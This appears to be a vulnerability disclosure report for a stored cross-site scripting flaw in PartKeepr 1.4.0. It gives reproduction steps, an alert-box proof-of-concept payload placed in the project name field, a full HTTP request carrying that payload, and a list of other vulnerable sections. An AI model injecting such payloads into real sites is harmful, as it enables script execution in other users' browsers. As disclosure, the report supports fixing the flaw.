Stored XSS in PartKeepr

[AMontesG]

Description

Stored XSS in PartKeepr 1.4.0 Edit section in multiple api endpoints via name parameter

Reproduction Steps

Browsing to Edit tab, select project and add new project.
There, insert the following payload <img src=x onerror=alert(1)> in name field.

The request performed is the following, being name the vulnerable parameter :

POST /api/projects HTTP/1.1
Host: partkeepr.vuln
Cookie: PHPSESSID=fju4llfcogfr2q9ug1bl982117
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Authorization: Basic YWRtaW46YWRtaW4=
Content-Type: application/json
X-Requested-With: XMLHttpRequest
Content-Length: 303
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close

{"name":"<img src=x onerror=alert(1)>","description":"","projectPartKeeprProjectBundleEntityProjectAttachments":[],"attachments":[],"projectPartKeeprProjectBundleEntityProjectParts":[],"parts":[],"projectPartKeeprProjectBundleEntityProjectRuns":[],"projectPartKeeprProjectBundleEntityReportProjects":[]}

Then, when another user goes to edit tab and clicks the project with the payload as name, XSS triggers

Apart from projects , the following tabs are also vulnerable : footprints,manufacturers,storage locations, distributors, part measurement units , units and batch jobs

System Information

• PartKeepr Version: 1.4.0
• Operating System: LInux
• Web Server: Apache
• PHP Version: 7.4
• Database and version: Mysql
• Reproducible on the demo system: Yes